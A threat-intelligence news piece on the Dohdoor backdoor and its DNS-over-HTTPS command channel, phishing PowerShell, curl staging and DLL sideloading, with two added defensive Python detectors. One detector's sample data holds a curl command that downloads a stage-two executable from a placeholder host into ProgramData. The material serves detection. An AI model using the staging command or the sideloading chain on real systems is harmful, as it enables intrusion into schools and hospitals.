A new strain of malware is infiltrating schools and healthcare sectors across America through a multi-stage attack sequence.

Researchers have uncovered an emerging cyber threat specifically aimed at schools and medical facilities in America starting as early as January of this year.

An unattributed threat actor tracked as "UAT-10027" uses a covert backdoor known as "Dohdoor," combining evasion tactics with layered, staged deployment in order to maintain unauthorized control over targeted systems.

The new malware strain reflects a growing tendency among capable cybercriminals to target industries that handle sensitive personal data but lack adequate protective measures.

The backdoor's defining trait is its use of DNS-over-HTTPS (DoH) to communicate with its C2 servers; this approach turns an established, trusted network service into a covert data transmission channel.

By routing malicious C2 traffic through Cloudflare's DoH resolver, the malware makes its activity look like the standard HTTPS traffic that flows across any typical network.

The actor reinforces the disguise with domain names such as "msoWinsoftUpdate" and "deepInspectionSystem," which resemble legitimate software updates or security checks.


Mixed-case domain names registered under less common TLDs such as .online, .design, and .software help the campaign evade automated pattern-matching and blocklist protections.
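The two evasion traits described above, DoH to a public resolver and mixed-case lookalike names on uncommon TLDs, can be turned into a simple scoring rule. The following is an added example (not code from Cisco Talos or the report it describes): it runs over constructed log lines from a hypothetical TLS-inspecting proxy that records the DoH query name it decoded, and flags DoH requests from processes that do not normally speak DoH when the queried name also carries the naming traits the report mentions. The resolver list, the allowlist of expected DoH clients, the log format and the threshold are all assumptions to tune for a real environment.

```python
import re
from dataclasses import dataclass, field

# Constructed sample log lines (not real telemetry): a TLS-inspecting proxy
# that logs the DoH query name it decoded from each request.
SAMPLE_LOG = """\
2025-02-03T09:12:01Z host=LAB-PC-07 proc=svchost.exe dst=cloudflare-dns.com path=/dns-query qname=settings-win.data.microsoft.com
2025-02-03T09:12:05Z host=LAB-PC-07 proc=fondue.exe dst=cloudflare-dns.com path=/dns-query qname=msoWinsoftUpdate.online
2025-02-03T09:12:09Z host=LAB-PC-07 proc=ScreenClippingHost.exe dst=cloudflare-dns.com path=/dns-query qname=deepInspectionSystem.design
2025-02-03T09:12:11Z host=LAB-PC-07 proc=chrome.exe dst=www.example.com path=/index.html qname=-
2025-02-03T09:12:15Z host=LAB-PC-07 proc=firefox.exe dst=cloudflare-dns.com path=/dns-query qname=wikipedia.org
2025-02-03T09:12:20Z host=LAB-PC-07 proc=python.exe dst=cloudflare-dns.com path=/dns-query qname=example.com
"""

# Public DoH resolvers and the RFC 8484 endpoint path. Cloudflare's resolver is
# the one the report names; the others are assumptions for completeness.
DOH_RESOLVERS = {"cloudflare-dns.com", "dns.google", "dns.quad9.net"}
DOH_PATH = "/dns-query"

# Processes that legitimately speak DoH on a typical Windows host (assumption:
# the OS resolver service and browsers; tune to your environment).
EXPECTED_DOH_CLIENTS = {"svchost.exe", "firefox.exe", "chrome.exe", "msedge.exe"}

# TLDs the report calls out, and words that make a name look like an update
# or security check.
UNCOMMON_TLDS = {"online", "design", "software"}
LOOKALIKE_WORDS = ("update", "inspection", "security", "patch")

LINE_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) proc=(?P<proc>\S+) dst=(?P<dst>\S+) "
    r"path=(?P<path>\S+) qname=(?P<qname>\S+)$"
)


@dataclass
class Finding:
    ts: str
    host: str
    proc: str
    qname: str
    score: int = 0
    reasons: list = field(default_factory=list)


def parse_line(line):
    """Parse one log line into a dict of fields, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def score_doh_request(rec):
    """Score one request; returns None when the request is not DoH at all."""
    if rec["dst"].lower() not in DOH_RESOLVERS or rec["path"] != DOH_PATH:
        return None
    f = Finding(rec["ts"], rec["host"], rec["proc"], rec["qname"])
    qname = rec["qname"]
    if rec["proc"].lower() not in EXPECTED_DOH_CLIENTS:
        f.score += 2
        f.reasons.append("unexpected DoH client process")
    # DNS names are case-insensitive and stub resolvers normally emit them in
    # lower case, so mixed case in a query name is an operator's choice.
    if any(c.isupper() for c in qname) and any(c.islower() for c in qname):
        f.score += 1
        f.reasons.append("mixed-case query name")
    if qname.rsplit(".", 1)[-1].lower() in UNCOMMON_TLDS:
        f.score += 1
        f.reasons.append("uncommon TLD")
    if any(w in qname.lower() for w in LOOKALIKE_WORDS):
        f.score += 1
        f.reasons.append("update/security lookalike wording")
    return f


def analyze(log_text, threshold=3):
    """Return the findings for every DoH request scoring at or above threshold."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        f = score_doh_request(rec)
        if f is not None and f.score >= threshold:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f.ts, f.proc, f.qname, f.score, "; ".join(f.reasons))
```

With the default threshold the two lookalike names queried by non-browser processes are reported, while the browser and OS resolver traffic to the same Cloudflare endpoint is not; lowering the threshold to 2 also surfaces the unexpected client that queried an ordinary name, which is the trade-off between coverage and noise that the scoring exposes.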

Cisco Talos researchers detected an active campaign by UAT-10027 that abuses legitimate Windows binaries, so-called living-off-the-land binaries (LOLBins), to load the Dohdoor malware onto infected machines.

The analysis found that the actor's infrastructure was carefully designed to avoid identification by hiding the locations of its command-and-control servers behind Cloudflare's widely used global network, complicating attempts to intercept and filter the attackers' communications.

The initial detection came from anomalous download activity flagged by Talos, which correlated it with a series of sophisticated attacks on educational institutions and healthcare facilities.

The attacker is believed to use deceptive phishing emails to deliver a PowerShell payload to the target system.

On execution, the PowerShell script uses curl to download a malicious executable from an encrypted URL, and a Windows batch (.bat) script is fetched separately from a secondary remote repository.

Attack chain (Source - Cisco Talos)
This begins an intricate infection chain in which each phase hands off cleanly to the next, keeping the malware's footprint on the system minimal at every step.

Inside the Multi-Stage Infection Mechanism
The downloaded executable serves two purposes: it installs the malware and cleans up the traces left behind by its own intrusion into the system.

It first creates an inconspicuous working directory under C:\ProgramData or C:\Users\Public, then downloads a malicious DLL (dynamic link library) directly from its command-and-control server, disguised under an innocuous name such as propsys.dll, together with a batch utility.

A decompiled version of the Windows batch file containing C2 URL references has been provided by Cisco Talos.
Legitimate Windows programs such as Fondue, a system performance-monitoring utility, and ScreenClippingHost are among the binaries abused in the chain.
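The infection chain above leaves two endpoint artefacts a defender can look for: PowerShell spawning curl to write into C:\ProgramData or C:\Users\Public, and a legitimate Windows binary loading a propsys.dll that does not live in the system directories. The following is an added example, not code from Cisco Talos: it applies those two rules to constructed Sysmon-style events (ProcessCreate with ParentImage/Image/CommandLine, ImageLoad with Image/ImageLoaded). The staging paths, the URL, the copied binary locations and the assumption that curl is invoked with a plain -o/--output argument are all hypothetical.

```python
import re

# Legitimate Windows binaries the report names as abused in the chain, and the
# DLL name it names as the disguise for the payload.
SIDELOAD_HOSTS = {"fondue.exe", "screenclippinghost.exe"}
SIDELOADED_DLL = "propsys.dll"
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Staging directories the report names.
STAGING_DIRS = ("c:\\programdata\\", "c:\\users\\public\\")

# Constructed Sysmon-style events (not real telemetry). Paths under the staging
# directories and the example.invalid URL are placeholders.
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -s -o C:\ProgramData\svc\update.exe https://example.invalid/stage2"},
    {"EventType": "ProcessCreate",  # benign: an admin script fetching a report
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -o C:\Users\alice\Downloads\report.pdf https://intranet.example/report.pdf"},
    {"EventType": "ImageLoad",  # benign: the real propsys.dll from System32
     "Image": r"C:\Windows\System32\fondue.exe",
     "ImageLoaded": r"C:\Windows\System32\propsys.dll"},
    {"EventType": "ImageLoad",  # hypothetical: copied host binary beside a planted DLL
     "Image": r"C:\Users\Public\svc\fondue.exe",
     "ImageLoaded": r"C:\Users\Public\svc\propsys.dll"},
    {"EventType": "ImageLoad",
     "Image": r"C:\ProgramData\svc\ScreenClippingHost.exe",
     "ImageLoaded": r"C:\ProgramData\svc\propsys.dll"},
]


def _norm(path):
    """Normalise a Windows path for comparison: backslashes, lower case."""
    return path.replace("/", "\\").lower()


def _basename(path):
    return _norm(path).rsplit("\\", 1)[-1]


def _curl_output_path(cmdline):
    """Return the -o/--output target of a curl command line, or None.
    Assumption: the simple forms 'curl ... -o <path>' and '--output <path>';
    a quoted path containing spaces is not handled."""
    m = re.search(r'(?<!\S)(?:-o|--output)\s+"?([^"\s]+)"?', cmdline, re.IGNORECASE)
    return m.group(1) if m else None


def check_process_create(ev):
    """Rule 1: PowerShell launching curl that writes into a staging directory."""
    parent = _basename(ev.get("ParentImage", ""))
    image = _basename(ev.get("Image", ""))
    if parent not in {"powershell.exe", "pwsh.exe"} or image != "curl.exe":
        return None
    out = _curl_output_path(ev.get("CommandLine", ""))
    if out and _norm(out).startswith(STAGING_DIRS):
        return f"powershell->curl download staged at {out}"
    return None


def check_image_load(ev):
    """Rule 2: a known sideload host loading propsys.dll from outside the system directories."""
    host = _basename(ev.get("Image", ""))
    if host not in SIDELOAD_HOSTS:
        return None
    loaded = _norm(ev.get("ImageLoaded", ""))
    if _basename(loaded) == SIDELOADED_DLL and not loaded.startswith(SYSTEM_DIRS):
        return f"{host} loaded {ev['ImageLoaded']} from a non-system path"
    return None


def detect(events):
    """Run both rules over a list of events; return (event type, detail) alerts."""
    alerts = []
    for ev in events:
        if ev["EventType"] == "ProcessCreate":
            hit = check_process_create(ev)
        elif ev["EventType"] == "ImageLoad":
            hit = check_image_load(ev)
        else:
            hit = None
        if hit:
            alerts.append((ev["EventType"], hit))
    return alerts


if __name__ == "__main__":
    for kind, detail in detect(SAMPLE_EVENTS):
        print(kind, "-", detail)
```

Rule 2 keys on where the DLL is loaded from rather than where the host binary runs, so it fires whether the actor copies the legitimate executable into the staging directory or launches the System32 copy with a planted DLL on its search path; the genuine propsys.dll from System32 is left alone.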
